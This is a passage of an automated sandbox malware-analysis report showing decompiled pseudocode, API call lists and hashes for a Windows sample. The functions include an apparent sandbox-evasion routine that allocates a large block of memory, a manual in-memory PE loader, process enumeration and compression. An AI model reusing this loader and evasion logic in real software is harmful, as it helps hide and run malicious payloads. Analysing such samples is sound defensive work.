GetProcessHeap.KERNEL32(00000000,00A89F6B), ref: 00A8164D
HeapFree.KERNEL32(00000000), ref: 00A81654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00A81667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00A8167E
CloseHandle.KERNEL32(00000000), ref: 00A8168B

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcess_snwprintf$CloseEventHandleMutex
String ID:
API String ID: 2595929981-0
Opcode ID: 670f7e93fa08b92daec8a33a25c0906bb0e8a1d456376dbc7305701f5a2e32ea
Instruction ID: 73aec5dc4744889bdc98a673b062c56c08b38b2a2747c7ad51c86758a7ebe049
Opcode Fuzzy Hash: 670f7e93fa08b92daec8a33a25c0906bb0e8a1d456376dbc7305701f5a2e32ea
Instruction Fuzzy Hash: 3A21D871904155BBEB20EBE19C4DFDA3B7CEF41721F040091FA09EB282DA3089478B71

Uniqueness

Uniqueness Score: -1.00%

Function 00A89EE0, Relevance: 9.0, APIs: 6, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t6;
				void* _t11;
				void* _t18;

				E00A81B10(E00A81BE0(0xd22e2014), 0xa811f0, 9, 0x3966646c, 0xa8c1f0);
				E00A81B10(E00A81BE0(0x8f7ee672), 0xa810d0, 0x48, 0x6677a1d2, 0xa8c0d0);
				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
				_t18 = _t6;
				if(_t18 != 0) {
					memset(_t18, 0, 0x8000000);
					RtlFreeHeap(GetProcessHeap(), 0, _t18); // executed
					E00A815B0(_t11); // executed
				}
				ExitProcess(0);
			}

0x00a89efe
0x00a89f23
0x00a89f39
0x00a89f3f
0x00a89f43
0x00a89f4d
0x00a89f60
0x00a89f66
0x00a89f66
0x00a89f6d

APIs

GetProcessHeap.KERNEL32(00000000,08000000), ref: 00A89F32
RtlAllocateHeap.NTDLL(00000000), ref: 00A89F39
memset.NTDLL ref: 00A89F4D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A89F59
RtlFreeHeap.NTDLL(00000000), ref: 00A89F60

Part of subcall function 00A815B0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 00A815C9
Part of subcall function 00A815B0: _snwprintf.NTDLL ref: 00A81602
Part of subcall function 00A815B0: GetProcessHeap.KERNEL32(00000000,00A89F6B), ref: 00A8160E
Part of subcall function 00A815B0: HeapFree.KERNEL32(00000000), ref: 00A81615
Part of subcall function 00A815B0: _snwprintf.NTDLL ref: 00A81641
Part of subcall function 00A815B0: GetProcessHeap.KERNEL32(00000000,00A89F6B), ref: 00A8164D
Part of subcall function 00A815B0: HeapFree.KERNEL32(00000000), ref: 00A81654
Part of subcall function 00A815B0: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00A81667
Part of subcall function 00A815B0: CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00A8167E
Part of subcall function 00A815B0: CloseHandle.KERNEL32(00000000), ref: 00A8168B

ExitProcess.KERNEL32 ref: 00A89F6D

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Create_snwprintf$AllocateCloseEventExitFileHandleModuleMutexNamememset
String ID:
API String ID: 871367918-0
Opcode ID: 4436dc856ee70271a000b1c75f9bd34fdafd66ea55b705647f5da7644f2954f3
Instruction ID: 3d0381b71b8981e070c3950ce46319e2d9e9d9a4019e9b1f60edfdb3da87a648
Opcode Fuzzy Hash: 4436dc856ee70271a000b1c75f9bd34fdafd66ea55b705647f5da7644f2954f3
Instruction Fuzzy Hash: B7F03031B842117BF61437F46C6FF1F39195B40FA6F144A20B60AAA6D7EDB149024FB9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A81F40, Relevance: 9.2, APIs: 6, Instructions: 163
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A81F40(void* __ecx, void* __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				struct HINSTANCE__* _v20;
				intOrPtr _t55;
				struct HINSTANCE__* _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed short _t65;
				CHAR* _t68;
				_Unknown_base(*)()* _t69;
				intOrPtr* _t70;
				signed int _t71;
				void* _t79;
				intOrPtr _t81;
				struct HINSTANCE__* _t82;
				void* _t85;
				intOrPtr _t86;
				signed short* _t89;
				void* _t90;
				intOrPtr* _t91;
				_Unknown_base(*)()** _t93;
				void* _t96;
				intOrPtr* _t99;
				void* _t102;
				intOrPtr* _t104;
				signed short* _t106;
				void* _t108;
				void* _t109;
				signed short _t128;

				_t79 = 0;
				_t90 = __ecx;
				if(__edx <= 0x40 ||  *((intOrPtr*)(__ecx)) != 0x5a4d) {
					L33:
					return _t79;
				} else {
					_t99 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
					_v8 = _t99;
					if( *_t99 != 0x4550 ||  *((intOrPtr*)(_t99 + 0x18)) != 0x10b) {
						L32:
						goto L33;
					} else {
						_t79 = VirtualAlloc(0,  *(_t99 + 0x50), 0x3000, 0x40);
						if(_t79 != 0) {
							memcpy(_t79, _t90,  *(_t99 + 0x54));
							_t109 = _t108 + 0xc;
							_t81 = _v8;
							_t102 = _t99 + 0x18 + ( *(_t99 + 0x14) & 0x0000ffff);
							_t55 = _t102 + (( *(_t81 + 6) & 0x0000ffff) + ( *(_t81 + 6) & 0x0000ffff) * 4) * 8;
							_v12 = _t55;
							if(_t102 < _t55) {
								do {
									_t86 =  *((intOrPtr*)(_t102 + 0x10));
									_t87 =  <  ?  *((void*)(_t102 + 8)) : _t86;
									memcpy( *((intOrPtr*)(_t102 + 0xc)) + _t79,  *((intOrPtr*)(_t102 + 0x14)) + _t90,  <  ?  *((void*)(_t102 + 8)) : _t86);
									_t102 = _t102 + 0x28;
									_t109 = _t109 + 0xc;
								} while (_t102 < _v12);
								_t81 = _v8;
							}
							_t104 =  *((intOrPtr*)(_t81 + 0xa0)) + _t79;
							_v12 = _t79 -  *((intOrPtr*)(_t81 + 0x34));
							_t59 =  *((intOrPtr*)(_t81 + 0xa4)) + _t104;
							_v20 = _t59;
							if(_t104 < _t59) {
								do {
									_t70 = _t104 + 4;
									_t96 =  *((intOrPtr*)(_t104 + 4)) + _t104;
									_v16 = _t70;
									_t89 = _t104 + 8;
									if(_t89 < _t96) {
										do {
											_t71 =  *_t89 & 0x0000ffff;
											_t85 = (_t71 & 0x00000fff) +  *_t104;
											if((_t71 & 0x0000f000) == 0x3000) {
												 *((intOrPtr*)(_t85 + _t79)) =  *((intOrPtr*)(_t85 + _t79)) + _v12;
											}
											_t89 =  &(_t89[1]);
										} while (_t89 < _t96);
										_t70 = _v16;
									}
									_t104 = _t104 +  *_t70;
								} while (_t104 < _v20);
								_t81 = _v8;
							}
							_t60 =  *((intOrPtr*)(_t81 + 0x80));
							if(_t60 != 0 &&  *((intOrPtr*)(_t81 + 0x84)) != 0) {
								_t91 = _t60 + _t79;
								_t61 =  *((intOrPtr*)(_t91 + 0xc));
								_v8 = _t91;
								if(_t61 != 0) {
									while(1) {
										_t82 = LoadLibraryA(_t61 + _t79);
										_v20 = _t82;
										if(_t82 == 0) {
											break;
										}
										_t106 =  *_t91 + _t79;
										_t93 =  *((intOrPtr*)(_t91 + 0x10)) + _t79;
										_t65 =  *_t106;
										_t128 = _t65;
										if(_t128 == 0) {
											L29:
											_t91 = _v8 + 0x14;
											_v8 = _t91;
											_t61 =  *((intOrPtr*)(_t91 + 0xc));
											if(_t61 != 0) {
												continue;
											} else {
												return _t79;
											}
										} else {
											L24:
											L24:
											if(_t128 >= 0) {
												_t68 = _t65 + 2 + _t79;
											} else {
												_t68 = _t65 & 0x0000ffff;
											}
											_t69 = GetProcAddress(_t82, _t68);
											if(_t69 == 0) {
												break;
											}
											_t82 = _v20;
											_t106 =  &(_t106[2]);
											 *_t93 = _t69;
											_t93 = _t93 + 4;
											_t65 =  *_t106;
											if(_t65 != 0) {
												goto L24;
											} else {
												goto L29;
											}
										}
										goto L34;
									}
									VirtualFree(_t79, 0, 0x8000);
									_t79 = 0;
								}
							}
						}
						goto L32;
					}
				}
				L34:
			}

0x00a81f47
0x00a81f4a
0x00a81f4f
0x00a82105
0x00a8210b
0x00a81f63
0x00a81f67
0x00a81f69
0x00a81f72
0x00a82103
0x00000000
0x00a81f87
0x00a81f98
0x00a81f9c
0x00a81fa7
0x00a81fb1
0x00a81fb4
0x00a81fba
0x00a81fc3
0x00a81fc6
0x00a81fcb
0x00a81fd0
0x00a81fd0
0x00a81fd9
0x00a81fe7
0x00a81fed
0x00a81ff0
0x00a81ff3
0x00a81ff8
0x00a81ff8
0x00a82006
0x00a82008
0x00a82011
0x00a82013
0x00a82018
0x00a82020
0x00a82023
0x00a82026
0x00a82028
0x00a8202b
0x00a82030
0x00a82032
0x00a82032
0x00a82042
0x00a82049
0x00a8204e
0x00a8204e
0x00a82051
0x00a82054
0x00a82058
0x00a82058
0x00a8205b
0x00a8205d
0x00a82062
0x00a82062
0x00a82065
0x00a8206d
0x00a82080
0x00a82083
0x00a82086
0x00a8208b
0x00a82090
0x00a82099
0x00a8209b
0x00a820a0
0x00000000
0x00000000
0x00a820a7
0x00a820a9
0x00a820ab
0x00a820ad
0x00a820af
0x00a820da
0x00a820dd
0x00a820e0
0x00a820e3
0x00a820e8
0x00000000
0x00a820ea
0x00a820f2
0x00a820f2
0x00a820b1
0x00000000
0x00a820b1
0x00a820b1
0x00a820bb
0x00a820b3
0x00a820b3
0x00a820b3
0x00a820bf
0x00a820c7
0x00000000
0x00000000
0x00a820c9
0x00a820cc
0x00a820cf
0x00a820d1
0x00a820d4
0x00a820d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00a820d8
0x00000000
0x00a820af
0x00a820fb
0x00a82101
0x00a82101
0x00a8208b
0x00a8206d
0x00000000
0x00a81f9c
0x00a81f72
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,00000000,00000080,00A88A23,?,000DBBA0), ref: 00A81F92
memcpy.NTDLL(00000000,?,?,?,000DBBA0,?,?,?,?,?,?,?,00A88F82), ref: 00A81FA7
memcpy.NTDLL(?,?,?), ref: 00A81FE7
LoadLibraryA.KERNEL32(00A88F82), ref: 00A82093
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00A820BF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A820FB

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Virtualmemcpy$AddressAllocFreeLibraryLoadProc
String ID:
API String ID: 4175162697-0
Opcode ID: 20636ec43be9a90485d73c307038b4be75221ef924c4f1153a18f49b92754aea
Instruction ID: 1aa289105d3d64ed0a1bd3e9884e89f4b4c33efe9f3167f83aa051e827a5df93
Opcode Fuzzy Hash: 20636ec43be9a90485d73c307038b4be75221ef924c4f1153a18f49b92754aea
Instruction Fuzzy Hash: 7A518B72A002159FCB20DF59C884BB9B3F5FF44318B28456AE846E7241E771ED55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A82110, Relevance: 6.0, APIs: 4, Instructions: 39
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A82110(intOrPtr* __edx) {
				void* _v560;
				void* _t5;
				struct tagPROCESSENTRY32W* _t6;
				intOrPtr* _t13;
				void* _t14;

				_t13 = __edx;
				_t5 = CreateToolhelp32Snapshot(2, 0);
				_t14 = _t5;
				if(_t14 != 0xffffffff) {
					_t6 =  &_v560;
					_v560 = 0x22c;
					Process32FirstW(_t14, _t6);
					if(_t6 == 0) {
						L5:
						return CloseHandle(_t14);
					}
					do {
					} while (E00A88B30( &_v560, _t13) != 0 && Process32NextW(_t14,  &_v560) != 0);
					goto L5;
				}
				return _t5;
			}

0x00a8211f
0x00a82121
0x00a82127
0x00a8212c
0x00a8212e
0x00a82134
0x00a82140
0x00a82148
0x00a82173
0x00000000
0x00a82174
0x00a82150
0x00a8215d
0x00000000
0x00a82150
0x00a8217f

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A82121
Process32FirstW.KERNEL32(00000000,?), ref: 00A82140
CloseHandle.KERNEL32(00000000,?,?), ref: 00A82174

Part of subcall function 00A88B30: GetCurrentProcessId.KERNEL32(00000000,00000000,?,00A8215D,0000022C,00000000,?,?), ref: 00A88B47
Part of subcall function 00A88B30: GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,00A8215D,0000022C,00000000,?,?), ref: 00A88B75
Part of subcall function 00A88B30: RtlAllocateHeap.NTDLL(00000000,?,00A8215D), ref: 00A88B7C
Part of subcall function 00A88B30: lstrcpyW.KERNEL32(00000004,?), ref: 00A88B8F

Process32NextW.KERNEL32(00000000,0000022C), ref: 00A82169

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: HeapProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 3893281644-0
Opcode ID: c8225868484ad77b1599953b76d344eae6a5553979e5750f9472ab9a009be525
Instruction ID: c296c94d6acbcf2a6e447572575706dd4b4bbed75ac933b820f6f727e6657068
Opcode Fuzzy Hash: c8225868484ad77b1599953b76d344eae6a5553979e5750f9472ab9a009be525
Instruction Fuzzy Hash: 02F062355011147AD720FBB5BC4CFAE77ACEB49760F2443A5EE04D2181EB3499068FB4

Uniqueness

Uniqueness Score: -1.00%

Function 00A86E70, Relevance: 4.2, APIs: 3, Instructions: 428
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00A86E70(intOrPtr* __ecx, intOrPtr __edx) {
				int _v8;
				int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _t274;
				signed char _t282;
				int _t285;
				intOrPtr _t286;
				intOrPtr _t294;
				signed int _t304;
				signed char _t308;
				signed char _t311;
				signed char _t320;
				signed char _t331;
				signed char _t334;
				signed char _t340;
				signed char _t352;
				signed char _t355;
				signed int _t364;
				void* _t366;
				int _t367;
				signed char _t370;
				intOrPtr _t371;
				signed char _t374;
				signed char _t375;
				signed char _t376;
				char* _t377;
				char* _t378;
				char* _t379;
				signed char _t380;
				char* _t381;
				char* _t382;
				signed char _t385;
				signed char _t386;
				signed char _t387;
				char* _t388;
				char* _t389;
				char* _t390;
				char* _t391;
				char* _t396;
				signed char _t397;
				signed char _t398;
				char* _t399;
				char* _t400;
				intOrPtr _t401;
				intOrPtr _t402;
				signed int _t403;
				void* _t404;
				void* _t405;
				signed int _t406;
				void* _t407;
				int _t408;
				intOrPtr _t409;
				int _t412;
				signed int _t413;
				void* _t414;
				intOrPtr* _t415;
				void* _t416;

				_t402 = __edx;
				_t415 = __ecx;
				_v24 = __edx;
				_v12 = 0;
				if(( *(__ecx + 8) & 0x00080000) == 0) {
					L2:
					_v8 = 0;
				} else {
					_v8 = 1;
					if( *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
						goto L2;
					}
				}
				if( *_t415 != 0) {
					L6:
					_t274 = _t415 + 0x39272;
				} else {
					_t401 =  *((intOrPtr*)(_t415 + 0x8c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t401 < 0x14ccc) {
						goto L6;
					} else {
						_t274 =  *((intOrPtr*)(_t415 + 0x74)) + _t401;
					}
				}
				 *((intOrPtr*)(_t415 + 0x30)) = _t274;
				_v20 = _t274;
				 *((intOrPtr*)(_t415 + 0x34)) = _t274 + 0x14cbc;
				 *(_t415 + 0x58) = 0;
				 *(_t415 + 0x5c) = 0;
				 *( *(_t415 + 0x2c)) =  *( *(_t415 + 0x2c)) >>  *(_t415 + 0x38);
				 *((intOrPtr*)(_t415 + 0x28)) =  *((intOrPtr*)(_t415 + 0x28)) - (0 |  *(_t415 + 0x38) == 0x00000008);
				if(( *(_t415 + 8) & 0x00001000) != 0 &&  *((intOrPtr*)(_t415 + 0x64)) == 0) {
					_t397 =  *(_t415 + 0x44);
					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000078 << _t397;
					_t352 = _t397 + 8;
					 *(_t415 + 0x44) = _t352;
					if(_t352 >= 8) {
						do {
							_t400 =  *((intOrPtr*)(_t415 + 0x30));
							if(_t400 <  *((intOrPtr*)(_t415 + 0x34))) {
								 *_t400 =  *(_t415 + 0x48);
								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
							}
							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
						} while ( *(_t415 + 0x44) >= 8);
					}
					_t398 =  *(_t415 + 0x44);
					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000001 << _t398;
					_t49 = _t398 + 8; // 0x10
					_t355 = _t49;
					 *(_t415 + 0x44) = _t355;
					if(_t355 >= 8) {
						do {
							_t399 =  *((intOrPtr*)(_t415 + 0x30));
							if(_t399 <  *((intOrPtr*)(_t415 + 0x34))) {
								 *_t399 =  *(_t415 + 0x48);
								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
							}
							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
						} while ( *(_t415 + 0x44) >= 8);
					}
				}
				_t370 =  *(_t415 + 0x44);
				 *(_t415 + 0x48) =  *(_t415 + 0x48) | (0 | _t402 == 0x00000004) << _t370;
				_t66 = _t370 + 1; // 0x9
				_t282 = _t66;
				 *(_t415 + 0x44) = _t282;
				if(_t282 >= 8) {
					do {
						_t396 =  *((intOrPtr*)(_t415 + 0x30));
						if(_t396 <  *((intOrPtr*)(_t415 + 0x34))) {
							 *_t396 =  *(_t415 + 0x48);
							 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
						}
						 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
						 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
					} while ( *(_t415 + 0x44) >= 8);
				}
				_t403 =  *(_t415 + 0x48);
				_t409 =  *((intOrPtr*)(_t415 + 0x30));
				_t364 =  *(_t415 + 0x44);
				_v16 = _t403;
				if(_v8 != 0) {
					L31:
					if( *((intOrPtr*)(_t415 + 0x1c)) -  *((intOrPtr*)(_t415 + 0x40)) >  *((intOrPtr*)(_t415 + 0x24))) {
						_t285 = _v12;
						goto L58;
					} else {
						 *((intOrPtr*)(_t415 + 0x30)) = _t409;
						 *(_t415 + 0x48) = 0 << _t364 | _t403;
						_t331 = _t364 + 2;
						 *(_t415 + 0x44) = _t331;
						if(_t331 >= 8) {
							do {
								_t391 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t391 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t391 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t385 =  *(_t415 + 0x44);
						if(_t385 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t385;
							do {
								_t390 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t390 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t390 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t407 = 2;
						do {
							_t386 =  *(_t415 + 0x44);
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(_t415 + 0x3c) & 0x0000ffff) << _t386;
							_t126 = _t386 + 0x10; // 0x18
							_t334 = _t126;
							 *(_t415 + 0x44) = _t334;
							if(_t334 >= 8) {
								do {
									_t389 =  *((intOrPtr*)(_t415 + 0x30));
									if(_t389 <  *((intOrPtr*)(_t415 + 0x34))) {
										 *_t389 =  *(_t415 + 0x48);
										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
									}
									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
								} while ( *(_t415 + 0x44) >= 8);
							}
							 *(_t415 + 0x3c) =  *(_t415 + 0x3c) ^ 0x0000ffff;
							_t407 = _t407 - 1;
						} while (_t407 != 0);
						if( *(_t415 + 0x3c) > _t407) {
							do {
								_t387 =  *(_t415 + 0x44);
								 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(( *((intOrPtr*)(_t415 + 0x40)) + _t407 & 0x00007fff) + _t415 + 0x90) & 0x000000ff) << _t387;
								_t147 = _t387 + 8; // 0x10
								_t340 = _t147;
								 *(_t415 + 0x44) = _t340;
								if(_t340 >= 8) {
									do {
										_t388 =  *((intOrPtr*)(_t415 + 0x30));
										if(_t388 <  *((intOrPtr*)(_t415 + 0x34))) {
											 *_t388 =  *(_t415 + 0x48);
											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
										}
										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
									} while ( *(_t415 + 0x44) >= 8);
								}
								_t407 = _t407 + 1;
							} while (_t407 <  *(_t415 + 0x3c));
						}
					}
				} else {
					if(( *(_t415 + 8) & 0x00040000) != 0 ||  *(_t415 + 0x3c) < 0x30) {
						E00A86A80(_t415);
					} else {
						E00A85B10(_t415);
					}
					_t416 = _t416 + 4;
					_t285 = E00A86C30(_t415);
					_t408 =  *(_t415 + 0x3c);
					_v12 = _t285;
					if(_t408 == 0 ||  *((intOrPtr*)(_t415 + 0x30)) - _t409 + 1 < _t408) {
						L58:
						if(_t285 == 0) {
							 *((intOrPtr*)(_t415 + 0x30)) = _t409;
							 *(_t415 + 0x48) = _v16;
							 *(_t415 + 0x44) = _t364;
							E00A86A80(_t415);
							_t416 = _t416 + 4;
							E00A86C30(_t415);
						}
					} else {
						_t403 = _v16;
						goto L31;
					}
				}
				_t286 = _v24;
				if(_t286 != 0) {
					_t374 =  *(_t415 + 0x44);
					if(_t286 != 4) {
						_t413 = 0;
						 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
						_t308 = _t374 + 3;
						 *(_t415 + 0x44) = _t308;
						if(_t308 >= 8) {
							do {
								_t379 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t379 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t379 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t375 =  *(_t415 + 0x44);
						if(_t375 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t375;
							do {
								_t378 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t378 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t378 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t405 = 2;
						do {
							_t376 =  *(_t415 + 0x44);
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | (_t413 & 0x0000ffff) << _t376;
							_t230 = _t376 + 0x10; // 0x18
							_t311 = _t230;
							 *(_t415 + 0x44) = _t311;
							if(_t311 >= 8) {
								do {
									_t377 =  *((intOrPtr*)(_t415 + 0x30));
									if(_t377 <  *((intOrPtr*)(_t415 + 0x34))) {
										 *_t377 =  *(_t415 + 0x48);
										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
									}
									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
								} while ( *(_t415 + 0x44) >= 8);
							}
							_t413 = _t413 ^ 0x0000ffff;
							_t405 = _t405 - 1;
						} while (_t405 != 0);
					} else {
						if(_t374 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
							do {
								_t382 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t382 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t382 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						if(( *(_t415 + 8) & 0x00001000) != 0) {
							_t406 =  *(_t415 + 0x18);
							_t414 = 4;
							do {
								_t380 =  *(_t415 + 0x44);
								 *(_t415 + 0x48) =  *(_t415 + 0x48) | _t406 >> 0x00000018 << _t380;
								_t187 = _t380 + 8; // 0x10
								_t320 = _t187;
								 *(_t415 + 0x44) = _t320;
								if(_t320 >= 8) {
									do {
										_t381 =  *((intOrPtr*)(_t415 + 0x30));
										if(_t381 <  *((intOrPtr*)(_t415 + 0x34))) {
											 *_t381 =  *(_t415 + 0x48);
											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
										}
										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
									} while ( *(_t415 + 0x44) >= 8);
								}
								_t406 = _t406 << 8;
								_t414 = _t414 - 1;
							} while (_t414 != 0);
						}
					}
				}
				memset(_t415 + 0x8192, 0, 0x240);
				memset(_t415 + 0x83d2, 0, 0x40);
				 *((intOrPtr*)(_t415 + 0x64)) =  *((intOrPtr*)(_t415 + 0x64)) + 1;
				 *((intOrPtr*)(_t415 + 0x28)) = _t415 + 0x9273;
				 *(_t415 + 0x2c) = _t415 + 0x9272;
				 *((intOrPtr*)(_t415 + 0x40)) =  *((intOrPtr*)(_t415 + 0x40)) +  *(_t415 + 0x3c);
				_t294 = _v20;
				 *(_t415 + 0x38) = 8;
				 *(_t415 + 0x3c) = 0;
				_t366 =  *((intOrPtr*)(_t415 + 0x30)) - _t294;
				if(_t366 == 0) {
					L98:
					return  *(_t415 + 0x5c);
				} else {
					if( *_t415 == 0) {
						_t404 = _t415 + 0x39272;
						if(_t294 != _t404) {
							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t366;
							goto L98;
						} else {
							_t371 =  *((intOrPtr*)(_t415 + 0x8c));
